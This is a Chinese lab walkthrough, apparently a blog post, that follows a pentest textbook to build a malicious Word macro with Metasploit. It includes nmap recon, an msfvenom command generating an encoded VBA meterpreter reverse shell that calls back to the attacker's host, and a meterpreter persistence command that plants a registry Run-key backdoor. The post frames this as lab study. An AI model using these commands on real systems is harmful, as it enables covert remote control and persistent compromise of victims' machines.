使用Kali Linux Metasploit 复现 word宏

说明

按照《Kali Linux2 网络渗透测试实践指南 第二版 》第七章操作
仅供学习讨论使用,请勿进行非法操作

环境准备

“邪灵工作室“公众号”下载作者提供的 windows系统靶机 32bit
到kali 官网下载对应虚拟机并完成安装
上述虚拟机在VM Ware中打开

步骤

确认攻击机所在网络信息

ifconfig

请添加图片描述
可以看出本机ip地址为 192.168.229.133

确认所在网络存活主机信息

nmap 192.168.229.0/24

请添加图片描述
可以看出 192.168.229.135和192.168.229.136存活

构建宏病毒文件

使用msfvenom命令一个VBA类型的被控端

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.229.133 LPORT=4444 -e x86/shikata_ga_nai -f vba-exe

LHOST为Kali Linux所在的攻击机
生成的内容
请添加图片描述
请添加图片描述
请添加图片描述

构建宏文件

MACRO CODE
请添加图片描述
PAYLOAD DATA请添加图片描述
复制该word宏病毒文件至目标靶机

Metasploit

使用resverse_tcp exploit进行攻击

请添加图片描述

目标靶机打开word宏文件

攻击主机上监听4444端口,等待反弹会话成功
请添加图片描述

将宏文件加入系统启动项

使用run persistence命令

meterpreter > run  persistence -X -i  5  -p 4444 -r 192.168.229.133

此处p和r的参数均为LHOST, LPORT,即kali linux这台机器
请添加图片描述
下图,看目标主机注册表 Run 键值果然被写入了一个 xBGTyPHvfmbdk 的键值,执行后门 vbs 脚本
请添加图片描述

win7电脑怎么找到注册表

1.点击电脑的运行“开始”键,
2.搜索框里面输入“regedit”,
3.出现注册表程序“regedit.exe”,点击此程序。

验证随着系统启动而启动,控制不会中断

重启windows靶机
打开新的监听
请添加图片描述
登录windows靶机
结果 成功
请添加图片描述

删除注册表键值,再次验证

请添加图片描述

打开新的监听
结果,失败
请添加图片描述

此处参考渗透测试 ( 4 ) — Meterpreter 命令详解
Meterpreter 的强大之处之一在于它运行于内存中,不易被杀毒软件发现,但只要目标机环境合适,或你对自己的免杀足够自信,可通过该命令写入硬盘,下次目标机启动时,木马将会自启动。
执行过程:创建攻击载荷 -> 攻击载荷植入到目标主机 c:\windows\temp目录下,是一个.vbs的脚本 -> 写目标主机注册表键值实现开机自动运行。

  • 0
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值